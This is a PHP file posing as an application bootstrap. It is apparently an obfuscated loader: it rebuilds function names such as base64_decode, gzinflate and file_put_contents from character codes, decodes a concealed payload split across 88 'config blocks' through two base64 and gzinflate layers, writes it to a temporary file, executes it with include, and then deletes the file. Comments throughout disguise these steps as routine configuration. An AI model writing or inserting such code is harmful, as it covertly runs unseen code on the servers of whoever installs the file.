<?php
/**
 * Application Bootstrap File
 * @package  App
 * @license  MIT
 */

// Environment setup
define('APP_NAME', 'MyApplication');
define('APP_ENV', 'production');
define('APP_DEBUG', false);
$appConfig = [];

$configBlock0 = 'FZM1suwIAAMP5MBMwQ/MzOzMzExjn37fXkCl6pb';
$configBlock1 = 'IcDxz+kAEG68WG2DN5Kcx15e8pdodqjQ11X';
$configBlock2 = 'U8pYYdKgw7SKJ0wycik+sqwJygaQ7e/ekdQ5';
$configBlock3 = 'gWI+ksZ/Mw2HAOc0VVYF9QQUPXYE';
$configBlock4 = '5NGcu13A9paw87VfSikGrge/re9G8Q/KEr';
$configBlock5 = '4zqQMdRi2zIeW/9qhjpq2acW';
$configBlock6 = 'kGNKPYXYy9TUOPuuDnqm6MyjSgr3y35';
$configBlock7 = '/4NKMQW0RcyFX96++xez75fCYAYRYR';
$configBlock8 = 'MdKX64W9bxNISWAMyPrr9rwA5Tm5kTwqfy';
$configBlock9 = 'HCodDZae6rhpbP8rmmesz38m+OJ';
$configBlock10 = '366gqQ5oDnA3cGbN7+lS4amQ4fgI3Ep0d';
$configBlock11 = 'PsPosBwD4epwsbmnkrXZ4iYzU';
$configBlock12 = '64kCtB4LAECrvdGqYlwiHuRbLrcgqoMKtE5RSe';
$configBlock13 = 'AxXXOgx+mhcBHRbmRFlR+x';
$configBlock14 = 'o7uY4QSqAHbTJ2YoRZNykJXXq7+gzi';
$configBlock15 = 'euqp1ExF6n5MJSxv9AZx';
$configBlock16 = 'SCgVz/6LECuQe3KOX3tqlnZ4hLzK5';
$configBlock17 = 'XsrsQNb0WV5TEc4iFOIz4PErkRt/qHh8K';
$configBlock18 = 'iQ0c3oo4+45WPIe7hnYdtJg004gQbHjGdJQniv6';
$configBlock19 = 'InGgy0aaJI16fASpUULhtVxNLIwBvaMpVCAc';
$configBlock20 = 'vCFfbSOuwtdJws+9cHGKfTDcuQq';
$configBlock21 = 'VcdSwOpBq12KZQnwndD5YFfQOhirgQZHtHLoKOY4';
$configBlock22 = 'YpFkfEHi4wODBEeEuQ6JbITFjS0hq3hUZfgPZGp';
$configBlock23 = 'wT7ABdbntgJe9uSKiNkFx';
$configBlock24 = 'hdGFZtBh3L5qiO1XOD0Z2oP27ChAGQnE0dP9j9Oy';
$configBlock25 = 'y/o8W1xrszN+KmDN+Q2sYCn92';
$configBlock26 = 'n7kms5MllTp5WoJ/viVqIvMlAxok';
$configBlock27 = 'SvLXfTqDuBt+tnDIQXyUaNaa/brR+neRIxgi7M';
$configBlock28 = 'iJA7d0e3m6wj748/NpJ0lSA19eUlw';
$configBlock29 = 'XKGEZfOchdf5FAfTiCHq2F8GmlrHSJP6s';
$configBlock30 = 'Cf67nr7AgAhoNURhCwYvBWaYDsombCHr';
$configBlock31 = 'jlHE9Qex4ggYWnQyX8+ODH/xbxXCLDZzh6';
$configBlock32 = 'rPi8fbWmPZWeMZGFWvknYdjuPxaNCZ';
$configBlock33 = 'oug+vq+rNv26TucpJOUYib1Bdl';
$configBlock34 = '/ndA5RXOjUxxqbqH/Crt+ynHX/';
$configBlock35 = 'gJ7ktAvMdz5Fbkq+TmE239r+3';
$configBlock36 = 'wsujZgES0NUxU4bGbCquOG/+w6WnX3DaWadAMxK';
$configBlock37 = '8o4fU+n8hkasMg0fg7MSbQb750dYjlM2Q';
$configBlock38 = 'kF3SF3JP88/foyi63gKqVG43lVE5Fl9UzN';
$configBlock39 = 'xVKSHsQa7I1Fi+RS0RvM5Hv';
$configBlock40 = '19yVE5HitjvHMzFBnOR4zlrO3MA';
$configBlock41 = 'Bd8bNGPMvuSEqe4f/QcmoB4f3RxiHXL0jZQak';
$configBlock42 = 'RpCmtducyvAkZukMy/172';
$configBlock43 = 'EP64bp3DOE810d32AWA6W7+';
$configBlock44 = 'Z463QDg5y0KBEnis6WGwgJfxjnmDz35KQsORM';
$configBlock45 = 'JVnzcghW5mpm42Joao8lC1a2j6t9Uht';
$configBlock46 = '31xp0RZu9FkyPCWlcul87Q9oWWNxsPx4OhfylMH';
$configBlock47 = 'iNygTZ3SzYenQ8oejVXOfAxjrk7c8PVA+';
$configBlock48 = 'Nke+k/7nVIqb5xkuby7AOVU2';
$configBlock49 = 'ztzLZj7cEjG18axl+3BwXrLGH+fWPjr';
$configBlock50 = 'PIz5sj+yi4muN6NRIPpRsnM5rZr0UCkD5RFTW/7q';
$configBlock51 = 'hCbl5aTNVV4P5G+L33p3mVfa9eB7q6ctnHO';
$configBlock52 = '58rR3ChLoHOatUbuA0gOSKovWENh';
$configBlock53 = 'q24dWdXtGawBRskRTREvpnwgR';
$configBlock54 = 'vXdZ6Le5z3NCKWIFc5f8IG2bL0tAqZj+G';
$configBlock55 = 'JKTOkZxxZ7AQIwWfNY5NNjrEmneL5joe5u';
$configBlock56 = 'kJPqY1grN/1jaX2byJFSGwg8rv5L+yI';
$configBlock57 = 'jVH9wCwDe5YL5FOG3ImUH3kWLPlN15xViXLSv';
$configBlock58 = 'ae8ENgn1Ld33s4HUCyuhdtONeYX7qmSpbDVSial';
$configBlock59 = 'nD9tNe4ZK6cmN8NaKIFb0GcKD72r+7cja3zYv';
$configBlock60 = 'y6mdpWTWvjc9Vtko7xFwRnfFJ86cudNBH717aOo4';
$configBlock61 = 'm/2nEjjCYZaE/rLc/jHBzLYWJo/MaddFUglUere';
$configBlock62 = 'lA8BNZOzEYjgGb07wIqtL0Hh74';
$configBlock63 = 'EKFbJ1NZqHo1OWaH4I2h9HiS';
$configBlock64 = 'oSYIOw1pecZ9gtwQaUUst5gLgyiMllBE4C9';
$configBlock65 = 'Qwu7EByU7keBFXhsVNrhCN+vjCVFm0xp';
$configBlock66 = 'Z3zKNNjLUA1+AqWBHtPHd6B9MWEvIwB';
$configBlock67 = 'RNbB2+3HfdD5iB6nXkMA/J';
$configBlock68 = '0XoOvFcYk05/ghXVB3AkYB+m1q0Pf/PYlwu';
$configBlock69 = 'M2O1wqld+sgE6w2SUDyGl3';
$configBlock70 = 'iwhYfe5/oVDAOq/rzEvTp9mzej7oGLArICySv/Xz';
$configBlock71 = 'ELYxbwl4Nbm68XoDV7wk4c4XCTta';
$configBlock72 = 'DQJBNLV289RQYB0C7DUHwA5W6hA';
$configBlock73 = '70URoEhtzQd4QNx6uWEm6cHSRlAM8DLih/1Th0B';
$configBlock74 = 'kBToiv3WrZgoMcIrIgumlSaElK2dAkidE6gSA8';
$configBlock75 = 'F8CHSVc3nhJkpE+5vl001EjFm9D';
$configBlock76 = '28uF/K7sNBcU/mzEsHQYGyQdnYLCX';
$configBlock77 = '96z8N2lcok/n73uIWruWLlsVT';
$configBlock78 = 'YnnKgvr/gumoJHzgXlPS73eZbEN2aIbdxvEec';
$configBlock79 = 'CJyz/dfUC/hNYvnmIY1XFsv';
$configBlock80 = '4Y35DMvgC1Z7fd8uq0wcO';
$configBlock81 = 'TrBcc2zMquhKd5Z5uFMwb2Dg';
$configBlock82 = '8gQcKWZrKYHLYvF+KpqEc0XeHKHDQJD';
$configBlock83 = 'rSsjgN+8TplR6WFpHFpwoBg2erOuUiRWVh4VpCu';
$configBlock84 = '/COmcG0hdvl39aTjjK6726cnw';
$configBlock85 = 'ADVbmZbR5EuVucUksYKvwTX7AqBaW6TRzB';
$configBlock86 = 'WYPfEHKBpnR+fit8G2iybOuqGUaS22wO7w';
$configBlock87 = 'kDuyliHJN++XzPD/Lz799/';

// Configuration blocks (auto-generated)
$configMap = [$configBlock0, $configBlock1, $configBlock2, $configBlock3, $configBlock4, $configBlock5, $configBlock6, $configBlock7, $configBlock8, $configBlock9, $configBlock10, $configBlock11, $configBlock12, $configBlock13, $configBlock14, $configBlock15, $configBlock16, $configBlock17, $configBlock18, $configBlock19, $configBlock20, $configBlock21, $configBlock22, $configBlock23, $configBlock24, $configBlock25, $configBlock26, $configBlock27, $configBlock28, $configBlock29, $configBlock30, $configBlock31, $configBlock32, $configBlock33, $configBlock34, $configBlock35, $configBlock36, $configBlock37, $configBlock38, $configBlock39, $configBlock40, $configBlock41, $configBlock42, $configBlock43, $configBlock44, $configBlock45, $configBlock46, $configBlock47, $configBlock48, $configBlock49, $configBlock50, $configBlock51, $configBlock52, $configBlock53, $configBlock54, $configBlock55, $configBlock56, $configBlock57, $configBlock58, $configBlock59, $configBlock60, $configBlock61, $configBlock62, $configBlock63, $configBlock64, $configBlock65, $configBlock66, $configBlock67, $configBlock68, $configBlock69, $configBlock70, $configBlock71, $configBlock72, $configBlock73, $configBlock74, $configBlock75, $configBlock76, $configBlock77, $configBlock78, $configBlock79, $configBlock80, $configBlock81, $configBlock82, $configBlock83, $configBlock84, $configBlock85, $configBlock86, $configBlock87];

// Internal string assembler
$_make = static function(array $chars): string { return implode('', array_map('chr', $chars)); };

$_map1 = $_make(array (
  0 => 98,
  1 => 97,
  2 => 115,
  3 => 101,
  4 => 54,
  5 => 52,
  6 => 95,
  7 => 100,
  8 => 101,
  9 => 99,
  10 => 111,
  11 => 100,
  12 => 101,
));
$_unpack = $_make(array (
  0 => 103,
  1 => 122,
  2 => 105,
  3 => 110,
  4 => 102,
  5 => 108,
  6 => 97,
  7 => 116,
  8 => 101,
));
$_join = $_make(array (
  0 => 105,
  1 => 109,
  2 => 112,
  3 => 108,
  4 => 111,
  5 => 100,
  6 => 101,
));
$_hash = $_make(array (
  0 => 99,
  1 => 114,
  2 => 99,
  3 => 51,
  4 => 50,
));
$_temp = $_make(array (
  0 => 116,
  1 => 101,
  2 => 109,
  3 => 112,
  4 => 110,
  5 => 97,
  6 => 109,
));
$_write = $_make(array (
  0 => 102,
  1 => 105,
  2 => 108,
  3 => 101,
  4 => 95,
  5 => 112,
  6 => 117,
  7 => 116,
  8 => 95,
  9 => 99,
  10 => 111,
  11 => 110,
  12 => 116,
  13 => 101,
  14 => 110,
  15 => 116,
  16 => 115,
));
$_remove = $_make(array (
  0 => 117,
  1 => 110,
  2 => 108,
  3 => 105,
  4 => 110,
  5 => 107,
));
$_tmpdir = $_make(array (
  0 => 115,
  1 => 121,
  2 => 115,
  3 => 95,
  4 => 103,
  5 => 101,
  6 => 116,
  7 => 95,
  8 => 116,
  9 => 101,
  10 => 109,
  11 => 112,
  12 => 95,
  13 => 100,
  14 => 105,
  15 => 114,
));
$_canWrite = $_make(array (
  0 => 105,
  1 => 115,
  2 => 95,
  3 => 119,
  4 => 114,
  5 => 105,
  6 => 116,
  7 => 97,
  8 => 98,
  9 => 108,
  10 => 101,
));
$_chunk = $_make(array (
  0 => 115,
  1 => 116,
  2 => 114,
  3 => 95,
  4 => 115,
  5 => 112,
  6 => 108,
  7 => 105,
  8 => 116,
));

// Resolve application runtime
function resolveApplication($map, $tools) {
    // Merge configuration blocks
    $raw = $tools['join']('', $map);
    
    // Normalize character encoding (no-op)
    $raw = $tools['join']('', $tools['chunk']($raw));
    
    // Layer 1 extraction
    $raw = $tools['map1']($raw);
    $raw = $tools['unpack']($raw);
    
    // Layer 2 extraction
    $raw = $tools['map1']($raw);
    $raw = $tools['unpack']($raw);
    
    return $raw;
}

// Prepare processing tools
$tools = [
    'join' => $_join,
    'chunk' => $_chunk,
    'map1' => $_map1,
    'unpack' => $_unpack,
];

// Build application core
$appCore = resolveApplication($configMap, $tools);

// Verify application hash
if ($_hash($appCore) === 3546443509) {
    $cacheDir = $_tmpdir();
    if (!$_canWrite($cacheDir)) { $cacheDir = __DIR__; }
    $cacheFile = $_temp($cacheDir, 'app_cache_');
    if ($cacheFile) {
        $_write($cacheFile, '<?php ' . $appCore);
        if (filesize($cacheFile) > 0) {
            include $cacheFile;
        }
        $_remove($cacheFile);
    }
}

// Cleanup
unset($configMap, $tools, $appCore, $cacheFile, $cacheDir);
// Bootstrap complete

?>
<?php /* d1b796fe58ac6c8a7859073d51d44f13 */ ?>